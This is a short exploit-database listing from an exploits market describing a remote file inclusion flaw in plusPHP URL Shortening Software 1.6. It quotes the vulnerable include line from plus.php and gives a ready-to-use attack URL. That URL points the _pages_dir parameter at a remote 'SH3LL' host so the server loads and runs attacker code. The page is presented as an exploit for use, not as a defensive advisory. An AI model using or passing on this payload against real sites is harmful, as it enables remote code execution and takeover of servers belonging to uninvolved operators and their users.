[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

plusPHP URL Shortening Software 1.6 Remote File Inclusion Vulnerability

Author
DR.TOXIC
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3067
Category
web applications
Date add
24-05-2008
Platform
unsorted
=======================================================================
plusPHP URL Shortening Software 1.6 Remote File Inclusion Vulnerability
=======================================================================



Title: plusPHP Multi-User Short URL and Statistics (plus.php) RFI Vulnerability
Vulnerability Code: (plus.php) "include ($_pages_dir.'_config.php');"
Example;
http://localhost/plus.php?_pages_dir=http://SH3LL?




#  0day.today [2024-12-27]  #